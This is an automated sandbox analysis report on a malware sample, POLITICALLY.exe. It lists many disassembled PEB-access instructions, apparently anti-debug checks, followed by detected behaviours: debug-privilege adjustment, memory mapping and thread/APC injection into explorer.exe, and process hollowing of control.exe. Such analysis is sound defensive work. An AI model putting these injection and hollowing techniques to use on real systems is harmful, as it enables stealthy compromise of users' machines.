Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E23B1E1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]	10_2_1E2C41E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483849B mov eax, dword ptr fs:[00000030h]	23_2_0483849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F8CD6 mov eax, dword ptr fs:[00000030h]	23_2_048F8CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E14FB mov eax, dword ptr fs:[00000030h]	23_2_048E14FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]	23_2_048A6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]	23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]	23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]	23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]	23_2_048A6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]	23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]	23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]	23_2_048F740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]	23_2_048E1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485BC2C mov eax, dword ptr fs:[00000030h]	23_2_0485BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A44B mov eax, dword ptr fs:[00000030h]	23_2_0485A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]	23_2_048BC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]	23_2_048BC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484746D mov eax, dword ptr fs:[00000030h]	23_2_0484746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]	23_2_04852581
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]	23_2_04852581
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]	23_2_04852581
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]	23_2_04852581
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]	23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]	23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]	23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]	23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]	23_2_04822D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]	23_2_0485FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]	23_2_0485FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]	23_2_048F05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]	23_2_048F05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048535A1 mov eax, dword ptr fs:[00000030h]	23_2_048535A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]	23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]	23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]	23_2_04851DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov ecx, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]	23_2_048A6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]	23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]	23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]	23_2_048EFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048D8DF1 mov eax, dword ptr fs:[00000030h]	23_2_048D8DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482AD30 mov eax, dword ptr fs:[00000030h]	23_2_0482AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]	23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EE539 mov eax, dword ptr fs:[00000030h]	23_2_048EE539
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F8D34 mov eax, dword ptr fs:[00000030h]	23_2_048F8D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048AA537 mov eax, dword ptr fs:[00000030h]	23_2_048AA537
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]	23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]	23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]	23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04863D43 mov eax, dword ptr fs:[00000030h]	23_2_04863D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A3540 mov eax, dword ptr fs:[00000030h]	23_2_048A3540
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04847D50 mov eax, dword ptr fs:[00000030h]	23_2_04847D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]	23_2_0484C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]	23_2_0484C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BFE87 mov eax, dword ptr fs:[00000030h]	23_2_048BFE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]	23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A46A7 mov eax, dword ptr fs:[00000030h]	23_2_048A46A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04868EC7 mov eax, dword ptr fs:[00000030h]	23_2_04868EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048536CC mov eax, dword ptr fs:[00000030h]	23_2_048536CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048DFEC0 mov eax, dword ptr fs:[00000030h]	23_2_048DFEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F8ED6 mov eax, dword ptr fs:[00000030h]	23_2_048F8ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048376E2 mov eax, dword ptr fs:[00000030h]	23_2_048376E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048516E0 mov ecx, dword ptr fs:[00000030h]	23_2_048516E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]	23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]	23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]	23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04858E00 mov eax, dword ptr fs:[00000030h]	23_2_04858E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1608 mov eax, dword ptr fs:[00000030h]	23_2_048E1608
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]	23_2_0485A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]	23_2_0485A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482E620 mov eax, dword ptr fs:[00000030h]	23_2_0482E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048DFE3F mov eax, dword ptr fs:[00000030h]	23_2_048DFE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]	23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]	23_2_048EAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]	23_2_048EAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483766D mov eax, dword ptr fs:[00000030h]	23_2_0483766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]	23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]	23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]	23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]	23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]	23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04838794 mov eax, dword ptr fs:[00000030h]	23_2_04838794
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]	23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]	23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]	23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048637F5 mov eax, dword ptr fs:[00000030h]	23_2_048637F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]	23_2_048F070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]	23_2_048F070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]	23_2_0485A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]	23_2_0485A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484F716 mov eax, dword ptr fs:[00000030h]	23_2_0484F716
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]	23_2_048BFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h]	23_2_048BFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]	23_2_04824F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h]	23_2_04824F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485E730 mov eax, dword ptr fs:[00000030h]	23_2_0485E730
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483EF40 mov eax, dword ptr fs:[00000030h]	23_2_0483EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483FF60 mov eax, dword ptr fs:[00000030h]	23_2_0483FF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F8F6A mov eax, dword ptr fs:[00000030h]	23_2_048F8F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04829080 mov eax, dword ptr fs:[00000030h]	23_2_04829080
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]	23_2_048A3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h]	23_2_048A3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h]	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048690AF mov eax, dword ptr fs:[00000030h]	23_2_048690AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485F0BF mov ecx, dword ptr fs:[00000030h]	23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]	23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h]	23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov ecx, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048258EC mov eax, dword ptr fs:[00000030h]	23_2_048258EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]	23_2_048F4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h]	23_2_048F4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]	23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]	23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h]	23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]	23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]	23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]	23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]	23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h]	23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]	23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]	23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]	23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h]	23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]	23_2_04840050
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h]	23_2_04840050
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F1074 mov eax, dword ptr fs:[00000030h]	23_2_048F1074
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E2073 mov eax, dword ptr fs:[00000030h]	23_2_048E2073
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485A185 mov eax, dword ptr fs:[00000030h]	23_2_0485A185
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484C182 mov eax, dword ptr fs:[00000030h]	23_2_0484C182
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852990 mov eax, dword ptr fs:[00000030h]	23_2_04852990
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]	23_2_048561A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h]	23_2_048561A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A69A6 mov eax, dword ptr fs:[00000030h]	23_2_048A69A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]	23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]	23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]	23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h]	23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048B41E8 mov eax, dword ptr fs:[00000030h]	23_2_048B41E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]	23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]	23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h]	23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]	23_2_04829100
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]	23_2_04829100
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h]	23_2_04829100
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h]	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120 mov ecx, dword ptr fs:[00000030h]	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]	23_2_0485513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h]	23_2_0485513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]	23_2_0484B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h]	23_2_0484B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482C962 mov eax, dword ptr fs:[00000030h]	23_2_0482C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]	23_2_0482B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h]	23_2_0482B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]	23_2_0485D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h]	23_2_0485D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]	23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]	23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]	23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]	23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h]	23_2_048252A5

Source: C:\Users\user\Desktop\POLITICALLY.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\POLITICALLY.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: 330000

Jump to behavior

